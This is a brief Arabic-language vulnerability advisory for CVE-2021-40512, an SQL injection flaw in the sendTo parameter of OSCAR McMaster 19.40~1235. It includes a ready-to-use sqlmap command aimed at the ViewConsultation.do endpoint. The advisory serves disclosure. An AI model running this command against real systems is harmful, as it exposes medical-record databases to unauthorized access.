
CVE-2021-40512 ثغرة حقن SQL في OSCAR McMaster 19.40~1235.
توجد ثغرة حقن SQL في الإصدار 19.40~1235 من OSCAR McMaster. يمكن لمهاجم خبيث إصدار أوامر SQL إلى قاعدة بيانات MySQL/MariaDB من خلال المعامل sendTo القابل للاستغلال والموجود على نقطة النهاية /oscar/oscarEncounter/ViewConsultation.do.
[عنصر نائب لـ cve.mitre]
[عنصر نائب لـ nist]
صفحة JSP القابلة للاستغلال:
ViewConsultation.do - معامل sendTo
الحمولة القابلة للاستغلال:
sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0¤tTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie= -p sendTo --banner
اكتشفها Jack McBride، أغسطس 2021